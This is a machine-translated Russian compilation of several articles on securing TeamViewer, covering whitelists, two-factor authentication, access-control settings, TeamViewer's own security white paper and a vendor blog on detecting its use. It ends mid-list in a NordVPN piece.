Некоторые люди предпочитают вручную устанавливать очень надежный пароль для своей машины (а не полагаться на случайно сгенерированные пароли, которые TeamViewer использует по умолчанию). Если вы установите очень надежный пароль, а также воспользуйтесь функцией белого списка, к которой мы скоро вернемся, это безопасный вариант. Однако без белого списка личный пароль открывает еще один вектор атаки, поскольку кому-то для доступа к машине потребуется только ваш TeamViewer ID и пароль — им даже не понадобится токен двухфакторной аутентификации.
Мы не рекомендуем вам использовать функцию «легкий доступ», если у вас нет очень надежного пароля в вашей учетной записи TeamViewer и вы не включили двухфакторную аутентификацию, поскольку это устраняет необходимость в ручном или произвольно сгенерированном пароле для доступа к машине. (если вы вошли в свою учетную запись TeamViewer). Опять же, вам нужно найти баланс между безопасностью и простотой использования.
Если вы придерживаетесь случайно сгенерированных паролей (при этом конечный пользователь, например ваша мама, должен будет каждый раз сообщать вам пароль), мы рекомендуем вам изменить длину пароля с более слабой длины по умолчанию на «Очень безопасный (10 символов. ) ». Вы также можете отключить эту функцию, если на предыдущем шаге выбрали надежный пароль вручную.
В разделе «Правила подключения к этому компьютеру» вы можете указать две вещи: учетные данные для входа в Windows и черный / белый список. Мы настоятельно рекомендуем оставить для параметра «Вход в Windows» значение «Сейчас разрешено». Если вы включите этот параметр, TeamViewer примет учетные данные для входа, действительные на компьютере, в качестве действительного кода доступа для приложения. Если у пользователя на компьютере слабый пароль, это очень проблематично, и лучше всего оставить его отключенным.
Наконец, вы определенно хотите установить белый список для компьютера. Нажмите кнопку «Настроить» рядом с записью «Черный и белый список».
Выберите «Разрешить доступ только для следующих партнеров», а затем нажмите «Добавить». Вам будет представлен список ваших контактов TeamViewer для выбора. По умолчанию вы единственный человек в своем списке контактов. Если вы используете TeamViewer только для доступа к своим компьютерам, то это прекрасно, вы можете просто занести свои в белый список и назвать это хорошим.
Однако, если вы настраиваете компьютер для родственника, вам нужно будет добавить себя в качестве контакта в его учетную запись TeamViewer, если вы хотите использовать функцию белого списка. Вы можете сделать это, закрыв здесь меню опций, вернувшись в главное окно TeamViewer и щелкнув значок маленькой двойной стрелки рядом с их именем в правом нижнем углу экрана (это расширяет список «Компьютеры и контакты»). Нажмите «Добавить контакт» внизу списка, чтобы добавить себя в качестве контакта.
Если вам нужно добавить кого-нибудь еще (например, брата или сестру, который также помогает с компьютером мамы и папы), самое время сделать это.
Когда дополнительные люди, если необходимо, появятся в списке контактов, вы можете просто вернуться в предыдущее меню, выбрать «Добавить», а затем выбрать все учетные записи TeamViewer, которые вы хотите добавить в белый список. Нажмите «ОК» для подтверждения.
Расширенные параметры: детальное управление функциями удаленного доступа
Если вы зашли так далеко, настроив двухфакторную аутентификацию, используя надежные пароли, настроив белый список, — вы в отличной форме, и, возможно, вам больше не потребуется дополнительная настройка. Однако меню расширенных настроек предлагает действительно детальный контроль над аспектами работы TeamViewer, что позволяет вам защитить как свои собственные компьютеры, так и компьютеры людей, которым вы помогаете, как от постороннего вмешательства (а также от ошибок пользователя).
Чтобы получить доступ к расширенным настройкам, выберите вкладку «Дополнительно» на левой панели навигации.
Есть предупреждение о том, что вам действительно следует прочитать руководство, прежде чем вносить какие-либо изменения. Это правда. Вы обязательно должны
прочтите руководство
если вы планируете возиться с какими-либо настройками, мы не будем вас подробно рассказывать. Неспособность прочитать документацию — это путь к печали.
Чтобы получить доступ к дополнительным параметрам, нажмите «Показать дополнительные параметры». Есть много происходит здесь, но нас интересует только один конкретный раздел в расширенном меню «Расширенные настройки для подключения к этому компьютеру».
Здесь вы найдете запись для «Контроль доступа», которая по умолчанию установлена на «Полный доступ». Вместо того, чтобы оставлять для него «Полный доступ», мы настоятельно рекомендуем вам выбрать «Пользовательские настройки» из раскрывающегося меню.
После выбора «Пользовательские настройки» нажмите кнопку «Настроить» прямо под полем.
Здесь вы найдете широкий спектр детальных разрешений для сеанса удаленного доступа, которые можно настроить как «разрешить», «после подтверждения» или «отказано». Как вы настраиваете эти параметры высоко в зависимости от ваших потребностей, а настройки, представленные на скриншоте выше, просто показывают различные состояния, в которых могут находиться записи.
Если, например, вы настраиваете компьютер в своей домашней сети для легкого удаленного доступа, было бы глупо переключать «Подключиться и просматривать мой экран» на «После подтверждения», потому что вам придется тащиться вниз до конца. к серверу подвала, чтобы вручную подтвердить удаленный доступ. И в этот момент кому нужен удаленный доступ… вы уже стоите там.
С другой стороны, если у вас есть друг, член семьи, клиент, который беспокоится о конфиденциальности и о том, что вы можете просто случайным образом подключиться к их компьютеру без предупреждения, то включение «После подтверждения» позволяет вам сказать «Смотри» , таким образом я смогу подключиться к вашему компьютеру, чтобы помочь вам, только если вы явно нажмете ОК и разрешите это ».
Отдельные переключатели управления доступом подробно описаны на
стр. 72 руководства TeamViewer 11
(PDF), но мы выделим здесь настройки, которые обычно следует переключать на «После подтверждения» почти при любых обстоятельствах:
Перенести файлы : Установите для этого параметра значение «После подтверждения» для удаленных компьютеров, которые вы обслуживаете. Зачем давать злоумышленнику простой способ загрузить налоговые декларации ваших родителей или загрузить что-то на их компьютер?
Установите VPN-соединение с этим компьютером : Редко возникает необходимость в создании реальной виртуальной сети между компьютерами, и, если у вас нет действительно веских причин, чтобы оставить это включенным, вы должны отключить ее в целях безопасности. Установите для этого значение «Отклонено».
Управляйте локальным TeamViewer : Если вы настраиваете это на компьютере родственника, вы хотите установить для него значение «После подтверждения», если вам действительно нужно внести некоторые удаленные изменения в клиент TeamViewer в будущем. Если вы настраиваете его на собственном компьютере, установите для него значение «Отклонено». Как часто вам нужно будет удаленно подключаться к своей машине и вносить серьезные изменения в TeamViewer?
Передача файлов с помощью файлового ящика : Так же, как и в настройках передачи файлов, для этого нужно установить значение «После подтверждения». Если какие-либо файлы покидают удаленный компьютер, кто-то должен это подтвердить.
В дополнение к другим мерам безопасности, которые мы внедрили, эти дополнительные меры предосторожности гарантируют, что если кто-то получит доступ к TeamViewer, он не сможет перекачивать файлы или передавать вредоносное ПО на машину.
Наша следующая остановка важна, если вы используете случайно сгенерированные пароли для защиты удаленного компьютера. Под разделом «Контроль доступа» есть запись «Случайный пароль после каждого сеанса». В раскрывающемся меню выберите «Создать новый», чтобы создавать новый случайный пароль каждый раз, когда кто-то пытается подключиться к TeamViewer.
Опять же, как и все варианты, которые мы рассмотрели, настройте этот вариант в соответствии со сценарием, для которого вы используете TeamViewer. Если чтение длинного и случайного пароля по телефону неприемлемо для человека, которому вы помогаете, то вместо этого выберите надежный ручной пароль, который мы рассмотрели на вкладке «Безопасность» ранее в этом руководстве.
Наконец, если вы настроили удаленный компьютер с ограниченная учетная запись пользователя (мудрый выбор, если вы настроили компьютер для нетехнологически подкованного родственника), вы можете прокрутить вниз до «Параметры TeamViewer» и установить флажок «Для внесения изменений требуются права администратора на этом компьютере».
Это гарантирует, что только кто-то на компьютере с административным доступом (будь то вы или взрослый из удаленной семьи) сможет вносить изменения в настройки TeamViewer. Дополнительно (или в качестве альтернативы) вы также можете установить пароль прямо в приложении TeamViewer с помощью «Защитить параметры с помощью пароля».
Для осторожных: альтернативы TeamViewer
Мы лично не торопимся отказываться от TeamViewer, но если вы столкнулись с компромиссом в настройке TeamViewer, мы полностью понимаем, хотите ли вы попробовать альтернативное приложение для удаленного рабочего стола. Вот несколько альтернативных приложений, которые вы можете рассмотреть:
Удаленный рабочий стол Windows : Доступно для Windows и macOS (в качестве клиента для доступа к машинам Windows). Это бесплатно и довольно легко настроить, но имеет большое ограничение: пользователи любой версии Windows могут подключаться к другим ПК с Windows с помощью удаленного рабочего стола, но домашние версии Windows не могут поддерживать подключение. Чтобы получить помощь по настройке удаленного рабочего стола Windows, см. наш учебник здесь .
Splashtop : Бесплатно для личного использования, если вы просто используете его в локальной сети, но 16,99 долларов в год за «Anywhere Access Pack», который обеспечивает истинный удаленный доступ. Настольные клиенты доступны для Windows, macOS и Ubuntu Linux.
Splashtop
предлагает аналогичные возможности TeamViewer, включая управление удаленным рабочим столом, передачу файлов и т. д.
Удаленный рабочий стол Chrome : Относительно новое предложение от Google,
Удаленный рабочий стол Chrome
— бесплатное расширение для браузера Chrome, которое устанавливает безопасное подключение к удаленному рабочему столу между браузером Chrome пользователя и удаленным компьютером. Он кроссплатформенный и работает везде, где работает Chrome. Большой недостаток заключается в том, что он имеет более ограниченный набор функций, и если в системе, которую вы пытаетесь исправить, возникают проблемы с веб-браузером, вам понадобится альтернативный способ доступа к удаленному рабочему столу.
Мы предложили здесь три альтернативы из-за их схожей простоты использования и хорошей репутации, а не потому, что они по своей сути лучше TeamViewer или невосприимчивы к потенциальным атакам. Как всегда, тщательно взвесьте свои варианты и примените те же принципы, о которых мы говорили в отношении TeamViewer — не включайте инструмент, когда он не используется, используйте надежные пароли и т. Д. — при использовании альтернативного решения для удаленного рабочего стола.
Хотя настройка TeamViewer так же интенсивна, как мы только что сделали, путь больше работы, чем просто запуск приложения в состоянии по умолчанию, давайте будем реальными. Ваши данные и безопасность (а также данные и безопасность людей, которым вы помогаете с TeamViewer) того стоят. Когда у вас под рукой десятки вариантов безопасности, как мы только что продемонстрировали, нет оправдания запуску TeamViewer без учетной записи пользователя, без двухфакторной аутентификации и со слабым паролем.
Сквозная безопасность сети и данных для удаленного доступа
Подробная информация о функциях и поддерживаемые продукты
Шифрование данных и программ
TeamViewer включает шифрование на основе обмена частным / открытым ключом 4096 RSA и шифрование сеанса AES (256 бит). Эта технология основана на тех же стандартах, что и https / SSL, и соответствует современным стандартам безопасности. Обмен ключами также гарантирует полную защиту данных от клиента к клиенту. Это означает, что даже наши серверы маршрутизации не могут читать поток данных.Все программные файлы защищены с помощью технологии подписи кода DigiCert. Это позволяет вам проверить происхождение полученной исполняемой тактики.
Двухфакторная аутентификация
TeamViewer помогает компаниям соответствовать требованиям HIPAA и PCI. Двухфакторная аутентификация добавляет дополнительный уровень безопасности для защиты учетных записей от несанкционированного доступа. При двухфакторной аутентификации на вашем мобильном устройстве создается код помимо запроса имени пользователя и пароля для входа в учетную запись TeamViewer.Код генерируется с помощью алгоритма одноразового пароля с временной привязкой (TOTP).
Защита передачи файлов и невидимого доступа для сеансов поддержки
В дополнение к идентификатору партнера TeamViewer генерирует пароль сеанса, который изменяется при каждом запуске программного обеспечения, чтобы обеспечить дополнительную защиту от несанкционированного доступа к удаленной системе. Функции безопасности, такие как передача файлов, требуют дополнительного ручного подтверждения от удаленного партнера. Также невозможно невидимо управлять компьютером.В целях защиты данных пользователь должен иметь возможность определять, когда кто-то обращается к машине.
Процесс проверки и подтверждения доверенного устройства
Показатель доверенного устройства TeamViewer обеспечивает нашим клиентам еще большую защиту и помогает предотвратить доступ к учетной записи посторонних лиц. Эта функция гарантирует, что всякий раз, когда существующая учетная запись TeamViewer пытается войти в систему на любом устройстве в первый раз, мы просим подтвердить новое устройство как доверенное перед входом в систему.Уведомление в приложении запрашивает разрешение на устройство по ссылке, отправленной на адрес электронной почты аккаунта.
Принудительный сброс пароля при необычной активности
Система постоянно определяет, показывает ли учетная запись TeamViewer необычное поведение (например, доступ из нового места), которое может указывать на то, что она была взломана. В этом случае для защиты целостности данных учетные записи TeamViewer помечаются для принудительного сброса пароля. Затем TeamViewer отправляет электронное письмо с инструкциями по сбросу пароля.
Представлено в этих продуктах и решениях
Заявление о безопасности
— Насколько безопасен TeamViewer?
Эта статья применима ко всем пользователям TeamViewer.
TL; DR
Во всех версиях TeamViewer используется полное шифрование. Шифрование основано на обмене частным / открытым ключом 4096 бит RSA и 256-битном кодировании сеанса AES . Он использует тот же уровень безопасности, что и https / SSL, и считается полностью безопасным по сегодняшним стандартам.
Обмен ключами также гарантирует, что передача данных полностью закодирована от клиента к клиенту и что любые маршрутизаторы или серверы между ними (включая наши маршрутизаторы) не могут читать или анализировать поток данных.
Безопасность и конфиденциальность всегда были главным приоритетом при разработке.
Приглашаем вас ознакомиться с нашим Руководством по безопасности.
Целевая аудитория
Этот технический документ по безопасности предназначен для ИТ-специалистов и сетевых администраторов, которым необходим обзор стандартов и протоколов безопасности TeamViewer.Пожалуйста, поделитесь этим документом со своими клиентами и коллегами, чтобы ответить на их вопросы безопасности.
Если вы не являетесь профессиональным сетевым администратором, обратитесь к разделу «TeamViewer: Компания и программное обеспечение», чтобы получить краткое описание наших обязательств и подхода к обеспечению безопасности.
Компания и программное обеспечение
О нас
TeamViewer GmbH была основана в 2005 году, со штаб-квартирой в Геппингене, Германия, с офисами в Австралии, Азии и США.Мы разрабатываем и продаем программное обеспечение для удаленного подключения для безопасного удаленного доступа и поддержки, решений Интернета вещей, взаимодействия с клиентами и промышленных рабочих процессов с дополненной реальностью. За короткий промежуток времени бесплатная версия TeamViewer привела к быстрому росту: более 200 миллионов пользователей программного обеспечения TeamViewer на более чем 2,5 миллиардах устройств в более чем 200 странах по всему миру. Программное обеспечение доступно более чем на 30 языках.
Основы безопасности TeamViewer
TeamViewer используют одновременно более 45 миллионов пользователей в любой день.Эти пользователи предоставляют спонтанную поддержку через Интернет, получают доступ к автономным компьютерам (например, обеспечивают удаленную поддержку серверов) и проводят онлайн-встречи. В зависимости от конфигурации TeamViewer можно использовать для удаленного управления мышью и клавиатурой другого компьютера в режиме реального времени, как если бы вы обращались к нему лично.
Если администратор Windows, Mac или Linux входит в систему на удаленном компьютере, этому человеку также будут предоставлены права администратора на этом компьютере. Очевидно, что использование этой мощной функции через Интернет должно быть защищено строгими протоколами безопасности.Таким образом, мы ставим безопасность во главу угла всего, что мы делаем, создавая наше программное обеспечение с учетом требований безопасности.
Наша цель — обеспечить безопасный доступ к компьютерам. Ваша безопасность — наш наивысший приоритет: пользователи доверяют только безопасным решениям, и мы полностью привержены обеспечению безопасных решений для обеспечения долгосрочного успеха в бизнесе.
Управление качеством
Управление безопасностью немыслимо без установленной системы управления качеством. TeamViewer GmbH — ведущий мировой поставщик на рынке с сертифицированной системой управления качеством (QMS) ISO 9001.Наше управление качеством соответствует международно признанным стандартам и ежегодно проверяется внешними аудиторами.
Внешняя экспертная оценка
Программное обеспечение TeamViewer было награждено пятизвездочным знаком качества — максимальной оценкой, присвоенной Федеральной ассоциацией ИТ-экспертов и рецензентов (Bundesverband der IT-Sachverständigen und Gutachter e.V., BISG e.V.). Независимые обозреватели BISG e.V. проверять продукцию квалифицированных производителей на предмет их качества, безопасности и эксплуатационных характеристик.
Ссылки
Ведущие глобальные предприятия в различных отраслях, таких как финансовые услуги, здравоохранение, правительство и другие секторы с очень конфиденциальными данными, используют TeamViewer для безопасного удаленного доступа и поддержки, взаимодействия с клиентами, Интернета вещей и промышленных решений дополненной реальности. Чтобы увидеть, как ваши коллеги использовали TeamViewer в своих организациях, ознакомьтесь с историями успеха наших клиентов, доступными на нашем веб-сайте по адресу
Подключения TeamViewer
Удаленные подключения и сеансы
При установке удаленного сеанса TeamViewer определяет оптимальный тип подключения.
После установления связи через наши главные серверы прямое соединение по протоколу дейтаграмм пользователя (UDP) или протоколу управления передачей (TCP) устанавливается в 70 процентах всех случаев — даже за стандартными шлюзами, NAT и межсетевыми экранами.
Остальные соединения маршрутизируются через нашу сеть маршрутизаторов с высокой степенью резервирования через TCP или http-туннелирование. Это означает, что вам не нужно открывать какие-либо порты, чтобы использовать TeamViewer.
Как описано в разделе «Безопасные соединения» ниже, даже TeamViewer — как операторы серверов маршрутизации — не может читать зашифрованный трафик данных.
Безопасные соединения
Трафик TeamViewer защищен с помощью обмена открытым / закрытым ключом RSA 4096 и 256-битного шифрования сеанса AES . Эта технология используется в аналогичной форме для https / TLS и считается полностью безопасной по сегодняшним стандартам.
Поскольку закрытый ключ никогда не покидает клиентский компьютер, это гарантирует, что соединенные между собой компьютеры, включая серверы маршрутизации TeamViewer, не смогут расшифровать поток данных.
Каждый клиент TeamViewer имеет сертификат главного кластера, что позволяет ему проверять сертификаты системы TeamViewer.Эти сертификаты используются для установления связи между участниками сети TeamViewer.
См. Изображение ниже для упрощенного обзора обмена ключами рукопожатия
Аутентификация по паролю
При использовании протокола защищенного удаленного пароля (SRP) версии 6 данные, эквивалентные паролю, не передаются в процессе аутентификации TeamViewer по паролю.
На локальном компьютере хранится только средство проверки пароля. Дополнительные сведения см. В разделе «Учетная запись TeamViewer».
Проверка идентификаторов TeamViewer
Идентификаторы TeamViewer основаны на различных характеристиках оборудования и программного обеспечения и автоматически генерируются TeamViewer. Серверы TeamViewer проверяют действительность этих идентификаторов.
Защита от перебора
Когда дело доходит до безопасности TeamViewer, потенциальные клиенты регулярно спрашивают о шифровании. Понятно, что их больше всего беспокоит то, что данные доступа TeamViewer могут быть перехвачены или что третья сторона может контролировать их соединения.В TeamViewer есть протоколы защиты от атак методом перебора, чтобы соединения были безопасными и конфиденциальными.
В контексте компьютерной безопасности атака полным перебором — это метод проб и ошибок, позволяющий угадать пароль, защищающий ресурс. С ростом вычислительной мощности стандартных компьютеров время, необходимое для угадывания длинных паролей, все больше сокращается.
В качестве защиты от атак методом перебора TeamViewer экспоненциально увеличивает время ожидания между неудачными попытками ввода пароля.Например, для 24 неудачных попыток требуется 17 часов. Требуемое время ожидания между входами в систему сбрасывается только после успешного ввода правильного пароля.
TeamViewer не только имеет механизм защиты своих клиентов от атак с одного конкретного компьютера, но и от злоумышленников, контролирующих большое количество компьютеров, пытающихся получить доступ к определенному целевому компьютеру (например, с помощью ботнета).
Подписание кода
В качестве дополнительного уровня безопасности все наше программное обеспечение подписывается с помощью DigiCert Code Signing.Следовательно, издателя программного обеспечения всегда легко идентифицировать. Если впоследствии программное обеспечение было изменено, цифровая подпись автоматически становится недействительной.
Datacenter & Backbone
Чтобы обеспечить максимальную безопасность и доступность сервисов TeamViewer, все серверы TeamViewer расположены в центрах обработки данных, соответствующих стандарту ISO 27001, с использованием множественных резервных соединений операторов и резервных источников питания. Кроме того, используется только промышленное оборудование, а все серверы, на которых хранятся конфиденциальные данные, расположены в Германии или Австрии.
Наличие сертификата ISO 27001 означает, что персональный контроль доступа, видеонаблюдение, детекторы движения, круглосуточный мониторинг и персонал службы безопасности на месте гарантируют, что доступ к центру обработки данных предоставляется только уполномоченным лицам, что гарантирует наилучшее оборудование и безопасность данных. Также существует подробная идентификационная проверка на единой точке входа в центры обработки данных.
Учетная запись TeamViewer
Учетная запись TeamViewer размещена на выделенных серверах TeamViewer.Информацию об управлении доступом см. В разделе «Центр обработки данных и магистраль». Для авторизации используется протокол Secure Remote Password (SRP) версии 6. Этот протокол сочетает в себе преимущества традиционных способов хранения паролей. Мы не храним на наших серверах какую-либо информацию, которая может быть использована неавторизованной третьей стороной для аутентификации в качестве данной учетной записи. Кроме того, пароли никогда не отправляются на наши серверы во время аутентификации. Скорее, TeamViewer использует уникальный процесс проверки, действительный только для одного запуска аутентификации, который нельзя использовать повторно.
Данные, хранящиеся в учетной записи, такие как пароли, ключи и журналы чата, шифруются с использованием комбинации RSA и AES, где корневой ключ для шифрования является производным от пароля пользователя. Это гарантирует, что кто-либо без пароля не сможет получить доступ к данным, хранящимся в учетной записи.
Консоль управления
Консоль управления TeamViewer — это веб-платформа для управления пользователями, создания отчетов о соединениях и управления компьютерами и контактами.
Он размещен в центрах обработки данных, сертифицированных по стандарту ISO 27001 и HIPAA.Все данные передаются по защищенному каналу с использованием шифрования TLS (Transport Layer Security), стандартного для безопасных сетевых подключений к Интернету. Конфиденциальные данные хранятся в 256-битном шифровании AES / RSA. Он использует те же механизмы шифрования и аутентификации, которые описаны для учетных записей TeamViewer.
Настройки на основе политик
Из консоли управления TeamViewer пользователи могут определять, распространять и применять политики настройки для установок программного обеспечения TeamViewer на устройствах, которые им принадлежат.
Политики настройки подписываются цифровой подписью учетной записи, которая их создает. Это гарантирует, что единственной учетной записью, которой разрешено назначать политику устройству, является учетная запись, которой принадлежит устройство.
Безопасность приложений в TeamViewer
Список блокировок и разрешений
Особенно, когда TeamViewer используется для автоматического обслуживания и поддержки компьютера (т. Е. На удаленном компьютере нет партнера по подключению для приема входящих запросов на подключение), AllowList повышает безопасность.
Добавление идентификаторов TeamViewer или учетных записей в список AllowList позволяет ограничить количество людей, которые могут получить доступ к указанным машинам, с помощью явных именованных идентификаторов или учетных записей.
Более того, даже если пароль утерян или взломан, неавторизованные третьи стороны все равно не смогут получить доступ к устройству. Ограничения можно сделать так, чтобы разрешить удаленный доступ к компьютеру только определенным TeamViewer ID или учетным записям TeamViewer.
списками разрешений можно управлять с помощью политик, описанных в разделе «Консоль управления».
Черный список позволяет запретить определенным партнерам или устройствам устанавливать соединение с вашим компьютером. Учетные записи TeamViewer или идентификаторы TeamViewer из черного списка не могут подключиться к вашему компьютеру.
📌Примечание : вы по-прежнему сможете настраивать исходящие сеансы TeamViewer с партнерами в черном списке
Чат
Сообщения чата и их история зашифрованы и хранятся в учетной записи TeamViewer с помощью RSA / AES. как описано в разделе «Учетная запись TeamViewer».Только участники чата или чата 1: 1 могут получить доступ к сообщениям и истории.
Без скрытого режима
Нет функции, которая позволяет вам, чтобы TeamViewer работал в фоновом режиме незамеченным.
Даже если приложение работает как служба Windows в фоновом режиме, TeamViewer всегда отображается с помощью значка на панели задач.
После установки соединения над системным лотком всегда отображается небольшая панель управления. Поэтому TeamViewer намеренно непригоден для скрытого наблюдения за компьютерами или сотрудниками .Это позволяет пользователям предотвратить отображение конфиденциальных или конфиденциальных данных на их экране во время сеанса TeamViewer.
Доверенные устройства
Доверенные устройства — это альтернатива двухфакторной аутентификации, обеспечивающая дополнительный уровень безопасности для вашей учетной записи TeamViewer.
Если вы не настроили двухфакторную аутентификацию, автоматически применяются доверенные устройства. В качестве превентивной меры для обеспечения безопасности вашей учетной записи вы должны вручную авторизовать новые устройства или браузеры при входе в систему, чтобы получить с них доступ к своей учетной записи TeamViewer в первый раз.
В рамках процесса авторизации на ваш адрес электронной почты, связанный с вашей учетной записью TeamViewer, отправляется электронное письмо. Без добавления устройства, браузера или IP-адреса к своим доверенным устройствам вы не сможете войти в систему. Это защищает вашу учетную запись от других попыток входа в систему, поскольку им потребуется доступ к вашей электронной почте, а также для авторизации входа в систему.
Подробнее о доверенных устройствах и управлении надежными устройствами:
1. Надежные устройства
2. Доверительное управление для доверенных устройств
Защита паролем
Для спонтанной поддержки клиентов TeamViewer и TeamViewer QuickSupport генерируют случайный пароль, который можно изменить в любое время.Если ваши партнеры по подключению или лица, запрашивающие поддержку, сообщают вам свой пароль, вы можете подключиться к их компьютерам, введя их идентификатор и пароль.
В зависимости от настроек TeamViewer генерирует новый пароль после перезапуска, после сеанса или по запросу вручную. TeamViewer QuickSupport всегда генерирует новый пароль при запуске или по запросу пользователя.
При использовании TeamViewer для автоматической удаленной поддержки (например, для доступа к серверам и их обслуживания) мы рекомендуем следующее:
Подробнее об этом читайте в нашем Руководстве по безопасности.
В сочетании с двухфакторной аутентификацией использование этих функций безопасности поможет гарантировать, что только авторизованные люди могут получить доступ к указанным устройствам. Все пароли проверяются с использованием того же протокола SRP, который описан в разделе «Учетная запись TeamViewer».
Входящий и исходящий контроль доступа
Вы можете индивидуально настроить режимы подключения TeamViewer. Например, вы можете настроить удаленную поддержку или компьютер для встреч так, чтобы входящие соединения были невозможны.
Ограничение функциональности теми функциями, которые действительно необходимы, также означает снижение рисков потенциальных нарушений или атак.
Двухфакторная аутентификация
TeamViewer помогает компаниям выполнять требования HIPAA и PCI.Двухфакторная аутентификация добавляет дополнительный уровень безопасности для защиты учетных записей TeamViewer от несанкционированного доступа.
Помимо имени пользователя и пароля, пользователь должен ввести код для аутентификации. Этот код действителен только в течение короткого периода времени, сгенерированный с помощью алгоритма одноразового пароля на основе времени (TOTP).
Благодаря двухфакторной аутентификации и ограничению доступа путем добавления устройств в список разрешений TeamViewer позволяет вам соответствовать всем необходимым критериям для сертификации HIPAA и PCI.
Тестирование безопасности
Инфраструктура TeamViewer и программное обеспечение TeamViewer регулярно проходят тесты на проникновение. Тесты проводятся независимыми компаниями, специализирующимися на тестировании безопасности.
TeamViewer Риски безопасности и способы их снижения
TeamViewer — отличная утилита для удаленной помощи вашим родственникам или ИТ-специалистам, обслуживающим малый бизнес. Но использовать его в крупных организациях, особенно в критически важной инфраструктуре, довольно рискованно, как показала недавняя попытка отравить воду в городе во Флориде.
Детали этой истории важны, так как фактическое воздействие было смягчено за счет хороших процедур мониторинга, проводимых сотрудниками в смену, а также за счет физического ограничения количества опасного химического вещества, которое могло быть выпущено, но мы бы нравится сосредотачиваться на более широкой картине. Легко сказать: «Не используйте TeamViewer», но из-за нехватки бюджета, отсутствия на рынке экспертов по безопасности и отсутствия понимания руководителями рисков и важности использование TeamViewer является лишь симптомом.
TeamViewer сам по себе неплох. В нем есть свое место для задач службы поддержки, особенно при работе из дома, даже в крупных организациях. Но он позволяет вам легко выстрелить себе в ногу, бесшумно открывая один или несколько компьютеров (и, следовательно,, возможно, большую часть вашей инфраструктуры) Интернету.
Каковы риски безопасности при использовании TeamViewer?
Существует несколько угроз безопасности:
Утечка учетных данных — Цель TeamViewer — упростить использование.Поэтому учетные данные легко диктовать по телефону или вставлять в электронное письмо. Но это делает их склонными к утечкам. Утечка учетных данных означает полный захват злоумышленником
Вредоносные инсайдеры — TeamViewer позволяет злоумышленникам делать все, что они хотят. Что еще хуже, многие люди используют простые настройки по умолчанию, что приводит к совместному использованию учетных данных, что затрудняет обнаружение злоумышленника.
0 дней — TeamViewer фактически является облачной службой — обе стороны подключаются к серверу TeamViewer.Это позволяет TeamViewer применять политики безопасности (например, защиту от перебора), но он не застрахован от уязвимостей 0day. Один такой пример грубой силы был зарегистрирован в 2018 году. Другой более свежий пример позволяет фишинговым атакам захватить контроль над целевой машиной.
Как сделать TeamViewer более защищенным?
TeamViewer работает нормально, когда присутствуют, т.е. когда есть люди на обоих концах, по крайней мере, в начале соединения. Но поскольку он работает в фоновом режиме, целевая машина может быть захвачена в отсутствие человека-наблюдателя.Вот почему важно принять несколько мер безопасности в отношении TeamViewer:
Избегайте использования TeamViewer, по крайней мере, на серверах и машинах привилегированных пользователей — вместо этого используйте VPN, а затем SSH или RDP на нужном компьютере. pfSense — это брандмауэр с открытым исходным кодом (и бесплатный) с возможностями VPN, которые относительно легко настроить. Это отличный вариант, особенно если бюджет ограничен.
Обратите внимание на использование TeamViewer в организации — у вас может быть VPN, но некоторые сотрудники могут игнорировать общие рекомендации и запускать TeamViewer.Вы можете обнаружить использование TeamViewer, собирая журналы трафика (например, из брандмауэра). После сбора журналов вы можете использовать порт TeamViewer (5983) или запросы TCP / 443 к IP-адресам с записями PTR, разрешающимися в * .teamviewer.com, или (если у вас установлен агент на каждой конечной точке), посмотрите для процесса TeamViewer. Все это обычно достигается с помощью правильно настроенного SIEM. Как только вы найдете «нарушителей», есть разные подходы (общаться или блокировать)
Сбор журналов TeamViewer — если вам нужно использовать TeamViewer, соберите его журналы.Он генерирует несколько типов журналов, включая журналы подключений, поэтому их следует собирать (например, вашим SIEM) для поиска потенциально вредоносных шаблонов использования (например, использования в нерабочее время).
Настроить 2FA — TeamViewer позволяет настроить 2FA. Это снижает риск перехвата компьютера из-за утечки учетных данных.
Настройте белые списки — часто вы знаете, откуда вам понадобится доступ. Внесите эти IP-адреса в белый список, чтобы заблокировать доступ любой другой стороне.
Приведенный выше совет варьируется от «вообще не используйте его и блокируйте» до «если вам нужно его использовать, применяйте общие меры безопасности». И мы дважды упоминаем SIEM, что, вероятно, звучит неуместно в контексте небольших организаций, которые не могут позволить себе полноценный межсетевой экран, не говоря уже о SIEM. Это одна из причин, по которой мы в LogSentinel предлагаем SIEM организациям среднего размера и даже малым и средним предприятиям с предсказуемыми и доступными ценами.
Если смотреть в целом, организациям нужны люди и простые в использовании инструменты, чтобы выполнять свою работу и одновременно снижать риски безопасности.Люди дороги, и их трудно найти, а «легкость» и «безопасность» редко идут рука об руку. Но «критика» TeamViewer за риски, которые он несет из-за простоты использования, ни к чему не приведет. Что еще более важно, руководство, заботящееся о безопасности, доступный брандмауэр (или брандмауэр с открытым исходным кодом) и хороший SIEM могут значительно снизить риски безопасности, в том числе связанные с TeamViewer, и это то направление, в котором мы должны двигаться.
Узнайте больше о том, как LogSentinel SIEM может снизить риск безопасности при использовании TeamViewer:
Понравилась статья? Поделитесь им со своей сетью!
Божидар Божанов является соучредителем и генеральным директором в LogSentinel.Он старший инженер-программист и архитектор решений с 15-летним опытом работы в индустрии программного обеспечения. Божидар был спикером на многочисленных конференциях и входит в число популярных блоггеров и влиятельных лиц в технической сфере. Он также бывший советник правительства по электронному правительству, прозрачности и информационной безопасности.
Безопасен ли Teamviewer? | NordVPN
Что такое Teamviewer
Teamviewer — это инструмент для совместной работы в Интернете, который позволяет удаленно управлять другими компьютерами, совместно использовать рабочий стол, организовывать онлайн-встречи и обмениваться файлами.Однако его основная функция — позволить кому-то другому удаленно управлять вашим компьютером, например, для решения проблемы или установки программного обеспечения. Вы можете позволить кому-нибудь сделать это одним щелчком мыши.
Это довольно деликатная функция, требующая высокого уровня безопасности, однако миллионы людей доверяют Teamviewer и регулярно используют его из-за его функциональности и удобства использования.
Безопасен ли Teamviewer?
Teamviewer использует 256-битное шифрование AES, которое является признанным стандартом высокого качества и также используется NordVPN.Он также позволяет включить двухфакторную аутентификацию, принудительно сбросить пароль в случае подозрительной активности и внести доверенные устройства в белый список. Вы также можете усилить безопасность Teamviewer, изменив его настройки.
Хотя на бумаге все это выглядит хорошо, в прошлом у Teamviewer были некоторые проблемы с безопасностью. Еще в 2016 году он пострадал от взлома внешних паролей, в результате чего учетные записи пользователей опустошили их PayPal и банковские счета. В 2017 году он обнаружил уязвимость, которая позволяла хакерам получать контроль над устройствами пользователей во время их настольных сессий.К счастью, разработчики сразу устранили лазейку. Вот почему так важно правильно настроить параметры Teamviewer. Примите все меры предосторожности, чтобы обезопасить его.
Как повысить безопасность Teamviewer
Вот несколько советов по повышению безопасности Teamviewer:
